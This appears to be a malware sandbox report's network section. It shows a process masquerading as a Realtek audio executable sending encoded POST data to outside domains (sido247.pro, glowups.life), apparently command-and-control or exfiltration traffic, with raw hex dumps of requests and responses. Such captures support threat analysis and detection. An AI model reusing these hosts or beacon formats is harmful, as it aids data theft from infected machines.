                                                                                                                                                                                                                                62192.168.11.204982184.32.84.32807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:31.410336018 CET677OUTPOST /073p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.sido247.pro
                                                                                                                                                                                                                                Referer: http://www.sido247.pro/073p/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 41 75 31 72 45 2b 31 4f 50 38 59 57 6b 4c 58 45 49 4a 4f 43 6c 79 4e 63 79 7a 6b 56 4e 72 62 43 2b 42 32 36 57 56 72 54 32 32 51 7a 4e 69 53 39 70 42 4e 31 4e 31 74 75 45 31 56 4a 49 6c 56 79 48 6d 32 55 64 50 53 6f 45 33 42 79 59 75 67 6b 5a 69 68 30 68 77 6f 67 50 50 41 47 67 55 48 31 30 68 42 71 72 66 4c 41 32 69 4a 50 39 4b 4c 77 4a 43 76 2f 43 42 6d 76 64 71 54 5a 67 62 7a 43 50 55 54 6a 32 6d 2b 56 64 57 66 74 70 67 78 46 54 70 4d 6e 64 73 70 67 4e 38 6b 4e 33 41 67 73 70 62 72 58 56 45 66 31 71 63 6b 42 31 6c 52 69 5a 79 74 56 77 2f 45 6c 65 67 33 48 2f 48 70 6e 63 41 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=Au1rE+1OP8YWkLXEIJOClyNcyzkVNrbC+B26WVrT22QzNiS9pBN1N1tuE1VJIlVyHm2UdPSoE3ByYugkZih0hwogPPAGgUH10hBqrfLA2iJP9KLwJCv/CBmvdqTZgbzCPUTj2m+VdWftpgxFTpMndspgN8kN3AgspbrXVEf1qckB1lRiZytVw/Eleg3H/HpncA==


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                63192.168.11.204982284.32.84.32807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:34.144407988 CET697OUTPOST /073p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.sido247.pro
                                                                                                                                                                                                                                Referer: http://www.sido247.pro/073p/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 41 75 31 72 45 2b 31 4f 50 38 59 57 6b 76 54 45 4b 75 79 43 67 53 4d 75 72 44 6b 56 44 4c 62 47 2b 42 4b 36 57 52 61 49 32 41 41 7a 4e 48 2b 39 75 41 4e 31 42 56 74 75 50 56 56 47 56 56 55 2b 48 6d 36 36 64 4c 53 6f 45 33 56 79 59 72 63 6b 5a 56 31 33 7a 51 6f 69 55 66 41 45 75 30 48 31 30 68 42 71 72 66 66 75 32 69 52 50 39 37 37 77 49 6a 76 67 4c 68 6d 67 4b 61 54 5a 72 37 7a 4f 50 55 54 52 32 6a 6d 2f 64 55 6e 74 70 67 42 46 54 63 77 6b 58 73 70 6d 43 63 6c 73 34 51 67 70 70 4c 66 61 65 31 72 41 75 50 63 32 77 7a 63 34 45 41 5a 78 7a 73 59 58 61 51 4f 76 39 46 6f 38 42 43 66 50 30 65 6d 67 6e 65 4a 30 69 6e 57 63 4f 55 64 57 30 36 30 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=Au1rE+1OP8YWkvTEKuyCgSMurDkVDLbG+BK6WRaI2AAzNH+9uAN1BVtuPVVGVVU+Hm66dLSoE3VyYrckZV13zQoiUfAEu0H10hBqrffu2iRP977wIjvgLhmgKaTZr7zOPUTR2jm/dUntpgBFTcwkXspmCcls4QgppLfae1rAuPc2wzc4EAZxzsYXaQOv9Fo8BCfP0emgneJ0inWcOUdW060=


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                64192.168.11.204982384.32.84.32807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.878411055 CET5156OUTPOST /073p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.sido247.pro
                                                                                                                                                                                                                                Referer: http://www.sido247.pro/073p/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 41 75 31 72 45 2b 31 4f 50 38 59 57 6b 76 54 45 4b 75 79 43 67 53 4d 75 72 44 6b 56 44 4c 62 47 2b 42 4b 36 57 52 61 49 32 41 49 7a 4d 78 71 39 6f 6a 6c 31 41 56 74 75 47 31 55 68 56 56 56 6b 48 69 65 32 64 4c 57 53 45 30 74 79 4b 64 6f 6b 66 6b 31 33 35 51 6f 69 4c 50 41 46 67 55 48 73 30 68 52 75 72 66 50 75 32 69 52 50 39 35 6a 77 50 79 76 67 4e 68 6d 76 64 71 54 4e 67 62 7a 69 50 51 32 6b 32 69 53 46 64 45 48 74 70 45 74 46 55 2b 59 6b 56 4d 70 6b 4f 38 6c 4f 34 51 74 35 70 50 47 6c 65 32 33 35 75 4d 4d 32 39 31 4a 36 55 45 42 4d 6c 4f 4d 36 53 69 43 46 7a 31 63 7a 66 31 50 75 33 2b 76 4f 6b 62 4e 59 69 45 53 77 66 6d 78 68 6a 2b 58 76 50 4d 37 66 4e 6a 37 71 42 59 36 7a 53 58 75 4e 44 44 73 59 45 41 49 43 77 76 6d 79 37 42 67 64 31 55 6b 33 48 76 2b 36 44 64 41 43 55 42 50 48 78 69 2f 66 44 6d 49 70 69 4c 36 4d 4a 6e 7a 61 43 6b 43 67 2f 30 55 73 68 55 32 41 31 57 77 65 74 4c 70 45 76 53 66 35 56 78 72 68 43 6d 4a 4a 63 35 7a 41 34 75 7a 6a 53 67 52 62 35 53 6f 52 4a 75 2f [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=Au1rE+1OP8YWkvTEKuyCgSMurDkVDLbG+BK6WRaI2AIzMxq9ojl1AVtuG1UhVVVkHie2dLWSE0tyKdokfk135QoiLPAFgUHs0hRurfPu2iRP95jwPyvgNhmvdqTNgbziPQ2k2iSFdEHtpEtFU+YkVMpkO8lO4Qt5pPGle235uMM291J6UEBMlOM6SiCFz1czf1Pu3+vOkbNYiESwfmxhj+XvPM7fNj7qBY6zSXuNDDsYEAICwvmy7Bgd1Uk3Hv+6DdACUBPHxi/fDmIpiL6MJnzaCkCg/0UshU2A1WwetLpEvSf5VxrhCmJJc5zA4uzjSgRb5SoRJu/SIqo7eGXLkKIXul+7dDPG4SbtMkaY0P4fan31BmxeNlxbkmALxtZPI+G/Hb4+Lysk/31YBbJjFd+gWvrkXThz43g481TydRyiRa+AUR0Yz2VToTx2lSBBGXzlgHvGp14QQ/ktjkxqlmLIBOiimM5WY9gPMWLynG5Ngi4unWPr5uIE34dtni6mP7lpMM+l0OreYHiRZF0K5e86CVxmVXYvj4cRC15MgDP4A8UOxJNZwK+xlFi0F8I5T2r09Zy8+qIRQS6IQKlZ8G/a0unrIBeq2DNtyi1RBhu5MOw6z0HQPSVBZJbIjnG20iFu0cE4qQZlktn/5IrUC6ePHXP5p6a2c9cL/Io0AiAyidtCTfdvKdYj4rRM99wl0cHtlahU/MtpbW28WkYHzE++Gt845YC3BRT/z+kE83w4w0yfMvtJcQk78oXvdjWw8cNHIqhmfRFRrna5WGZaiivrBBbRhj43O5hkJp7XW8ckbNyYzLlN5M91RgxjlHrw1Lvl4/uzGQEL1fb8q/wF3YYJefsQBGpxS17SHjVGpdGN+QuO27t7gw0Udd4mcFInvuyG9NOO25j5GqSDCEYis01vx51aGVjgCuw1PMar4zKTL5ZrkKUbbouzhRW4ScMHb32t/SbdszN10YolZnx0aXnsXcUNTblTlZCUFPq/4eYn9 [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.878499985 CET2690OUTData Raw: 50 4a 32 6c 63 69 39 61 77 66 4e 63 79 69 56 49 79 4c 6d 76 35 4a 65 4d 46 6d 50 73 78 63 36 65 79 6c 6b 73 4a 6b 6f 6e 51 76 61 74 6d 45 78 6e 6a 75 50 57 71 51 73 41 38 45 4a 48 36 37 41 38 38 4a 62 35 62 45 4d 57 4f 65 4c 79 44 63 38 6e 54 41
                                                                                                                                                                                                                                Data Ascii: PJ2lci9awfNcyiVIyLmv5JeMFmPsxc6eylksJkonQvatmExnjuPWqQsA8EJH67A88Jb5bEMWOeLyDc8nTAFo+HR5PejZ4gFjHmU98xQjezYoy+xi/7yWMXv4GoKCgh8slNBNWrc9JnXh/mP9yCd6qXykVvAkV6CpZ58iNYfG1sLGRCCmUxhNeiIP4EmEOLZmI1InArNnPhOMIQqxjDaWOtyUlrnQYPutXQZlphnr0mLKWTl4DFS


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                65192.168.11.204982484.32.84.32807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.610806942 CET418OUTGET /073p/?pluxVm=NsdLHLYUe9sblrm0I+Crv144tHMQQbz/4RSieCn+7DwPKByw7jhxCyJ0LTJMQHRDPlmDRdKjKllFY9ccUXh843okMet3hg+QsBhX3tP/6BR9rZiNBzb3ESI=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.822619915 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:39 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 9973
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Server: hcdn
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                x-hcdn-request-id: 4bb15f49de0b4477064de4166dc0609e-asc-edge4
                                                                                                                                                                                                                                Expires: Tue, 03 Dec 2024 13:55:38 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.822767019 CET1289INData Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38
                                                                                                                                                                                                                                Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823132038 CET1289INData Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f
                                                                                                                                                                                                                                Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823187113 CET1289INData Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74
                                                                                                                                                                                                                                Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823283911 CET1289INData Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f
                                                                                                                                                                                                                                Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823329926 CET1289INData Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d
                                                                                                                                                                                                                                Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823370934 CET1289INData Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d
                                                                                                                                                                                                                                Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823415041 CET1289INData Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75
                                                                                                                                                                                                                                Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                66192.168.11.2049825209.74.79.42807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.003871918 CET680OUTPOST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 33 4c 30 73 44 36 68 2b 32 56 6b 69 4f 62 37 50 58 75 79 43 4e 64 4e 4d 55 41 79 36 48 6a 32 44 68 66 4b 6a 30 44 59 6f 66 74 38 74 59 72 48 46 75 4a 75 31 39 6d 65 66 4b 68 4f 56 70 4b 67 5a 6e 58 67 62 5a 46 69 76 48 32 38 76 34 65 76 64 74 30 65 79 54 56 7a 62 41 74 73 75 56 69 57 56 76 4e 63 64 71 73 42 68 4d 65 6e 72 38 2f 66 6f 4d 76 72 65 4e 43 78 66 6b 6a 52 64 33 76 4a 4e 6b 58 6a 73 47 63 63 49 51 7a 64 4f 5a 37 69 55 34 67 45 2b 57 69 6a 68 70 4c 54 37 6c 71 4c 56 68 43 59 64 78 35 46 78 4c 32 55 44 65 46 4c 79 63 2f 36 51 66 47 65 48 59 6b 4e 79 36 72 67 41 4d 67 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=3L0sD6h+2VkiOb7PXuyCNdNMUAy6Hj2DhfKj0DYoft8tYrHFuJu19mefKhOVpKgZnXgbZFivH28v4evdt0eyTVzbAtsuViWVvNcdqsBhMenr8/foMvreNCxfkjRd3vJNkXjsGccIQzdOZ7iU4gE+WijhpLT7lqLVhCYdx5FxL2UDeFLyc/6QfGeHYkNy6rgAMg==
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.176934958 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:45 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                67192.168.11.2049826209.74.79.42807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.706141949 CET700OUTPOST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 33 4c 30 73 44 36 68 2b 32 56 6b 69 50 2f 48 50 45 39 71 43 47 64 4e 50 62 67 79 36 49 44 32 48 68 66 47 6a 30 43 73 34 66 66 6f 74 62 50 44 46 76 49 75 31 2b 6d 65 66 42 42 4f 71 6a 71 67 43 6e 57 64 75 5a 46 75 76 48 32 34 76 34 66 2f 64 75 44 79 31 53 46 7a 64 5a 64 73 73 62 43 57 56 76 4e 63 64 71 73 56 4c 4d 65 2f 72 38 50 76 6f 4f 4b 66 5a 52 53 78 63 31 6a 52 64 6d 2f 49 6c 6b 58 69 35 47 5a 45 79 51 78 56 4f 5a 2b 65 55 34 78 45 39 59 69 6a 6e 74 4c 53 4e 71 5a 69 46 73 53 73 56 33 4b 78 32 43 6b 41 38 66 54 47 6f 42 4e 4f 30 63 56 43 31 63 55 30 61 34 70 68 62 52 6e 57 57 71 42 37 65 44 6e 6f 31 50 4d 59 4b 30 69 31 6d 78 45 38 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=3L0sD6h+2VkiP/HPE9qCGdNPbgy6ID2HhfGj0Cs4ffotbPDFvIu1+mefBBOqjqgCnWduZFuvH24v4f/duDy1SFzdZdssbCWVvNcdqsVLMe/r8PvoOKfZRSxc1jRdm/IlkXi5GZEyQxVOZ+eU4xE9YijntLSNqZiFsSsV3Kx2CkA8fTGoBNO0cVC1cU0a4phbRnWWqB7eDno1PMYK0i1mxE8=
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.878542900 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:47 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
